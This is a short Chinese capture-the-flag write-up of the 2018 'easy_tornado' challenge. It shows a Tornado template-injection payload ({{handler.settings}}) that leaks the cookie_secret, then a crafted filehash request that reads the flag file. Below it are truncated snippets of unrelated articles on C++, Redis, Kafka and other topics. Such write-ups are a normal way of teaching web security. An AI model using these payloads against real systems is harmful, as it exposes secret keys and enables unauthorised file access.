[护网杯 2018]easy_tornado1

devtools/2024/10/22 12:22:56/

打开题目

看到三个txt文件,分别打开这三个文件

flag在flllllllag里面

这里给出了一个加密方式,结合url中的filehash,可知要获取flag需要先获取cookie_secret,并将其与/fllllllllllllag组合加密输入到filehash中。猜测是tornado模板注入

构造payload:error?msg={{handler.settings}}

获取cookie_secret': '6244e5f4-8a2e-4512-b768-04b1117da149'}

md5加密为8a8f29db2c067b391248572282b4b140

然后构造payload得到flag

payload:/file?filename=/fllllllllllllag&filehash=8a8f29db2c067b391248572282b4b140


http://www.ppmy.cn/devtools/87640.html

相关文章

springboot民办高校科研项目管理系统-计算机毕业设计源码54009

摘 要 21世纪的今天,随着社会的不断发展与进步,人们对于信息科学化的认识,已由低层次向高层次发展,由原来的感性认识向理性认识提高,管理工作的重要性已逐渐被人们所认识,科学化的管理,使信息存…

C++重载递增运算符

#include<iostream> using namespace std;class MyInteger {friend ostream& operator<<(ostream& out, MyInteger myint); public:MyInteger(){m_Num 0;}//前置 MyInteger& operator(){m_Num;return *this;}//后置 MyInteger operator(int)//占位参…

个性化你的生产力工具:待办事项App定制指南

国内外主流的10款待办事项软件对比&#xff1a;PingCode、Worktile、滴答清单、番茄ToDo、Teambition、Todoist、Microsoft To Do、TickTick、Any.do、Trello。 在寻找合适的待办事项软件时&#xff0c;你是否感到选择众多、难以决断&#xff1f;一个好的待办事项工具可以大大提…

Python笔试面试题AI答之面向对象(3)

文章目录 12.Python中OOPS是什么&#xff1f;1. 类&#xff08;Class&#xff09;2. 对象&#xff08;Object&#xff09;3. 面向对象编程的主要特性4. 面向对象编程的优点 13.解释一下Python中的继承&#xff1f;继承的基本语法继承的特性继承的类型 14. 什么是封装&#xff1…

Hive3:库操作常用语句

1、创建库 create database if not exists myhive;2、选择库 use myhive;3、查看当前选择的库 SELECT current_database();4、查看库详细信息 desc database myhive;可以查看数据文件在hdfs集群中的存储位置 5、创建库时制定hdfs的存储位置 create database myhive2 …

TI音频功放TAS6511(一)

一、简要描述 TAS6511-Q1是一款单声道数字输入D类音频放大器&#xff0c;支持2 MHz开关频率&#xff0c;可实现成本和尺寸优化的单声道解决方案。该芯片的工作电压范围为4.5V至18V&#xff0c;可提供高达30W&#xff08;14.4V&#xff0c;4Ω&#xff0c;10%失真率&#xff09…

Redis主从复制、哨兵模式、集群

一、redis集群三种模式&#xff1a; 1.主从复制&#xff1a;最少3台&#xff0c;一主两从 redis主从复制与mysql主从复制类似&#xff0c;主可以写&#xff0c;写入主的数据通过RDB方式把数据同步到从服务器&#xff0c;从不能更新到主&#xff0c;也是哨兵模式的基础。 缺点…

什么是kafka的重平衡机制?

背景 kafka重平衡的主要发生在消费者端&#xff0c;重平衡的目的&#xff0c;主要是为了均衡消费者消费kafka的消息而设计的&#xff0c;对于动态加入消费者&#xff0c;减少消费者&#xff0c;以及消息分区变化这些场景中&#xff0c;若不设计消费者重平衡&#xff0c;容易出…